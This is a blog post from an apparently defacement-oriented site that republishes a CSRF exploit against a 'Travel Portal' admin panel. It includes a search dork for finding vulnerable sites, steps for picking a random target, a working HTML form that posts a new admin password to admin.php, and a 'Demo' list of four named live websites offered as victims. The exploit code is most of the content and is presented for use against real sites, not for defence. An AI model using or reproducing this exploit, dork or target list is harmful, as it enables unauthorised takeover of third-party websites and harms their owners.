Header Ads

Home > Defacing > Exploit > Injection > Travel Portal - Remote Admin Password Chang CSRF

Travel Portal - Remote Admin Password Chang CSRF

Wednesday, January 18, 2017 , ,
+++++++++++++++++++++++++++++++++++++++
# Exploit Title: Travel Portal - Remote Admin Password Chang ( CSRF )
# Author : OmidKiller
# Dork : inurl:admin/admin.php intext:Travel Portal
# Tested On: Kali Linux / Ubuntu Linux / Firefox
# Date: 16/1/2017
+++++++++++++++++++++++++++++++++++++++
# PoC :
1.Search Dork And Open Random Target
2.Edit <form method="post" action="http://target.com/admin/admin.php"> In " CSRF " And Use For Change Password ;)
Ex : <form method="post" action="http://www.sphider.eu/admin/admin.php">
+++++++++++++++++++++++++++++++++++++++
# CSRF :

<body>
<title>Exploit By OmidKiller</title>
</table>
<br>
<h3>Travel Portal - Remote Admin Password Change</h3>
<table>

<tr>
<form method="post" action="http://target.com/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Admin Name:</td><td align=left>admin<td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
</table>
</body>

+++++++++++++++++++++++++++++++++++++++
# Demo

[+] http://www.adia.info/stat/admin/admin.php
[+] http://www.sphider.eu/admin/admin.php
[+] http://ruebennest.de/planetstat/admin/admin.php
[+] http://intern.orthopaedics.or.at/kalender/admin/admin.php

Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.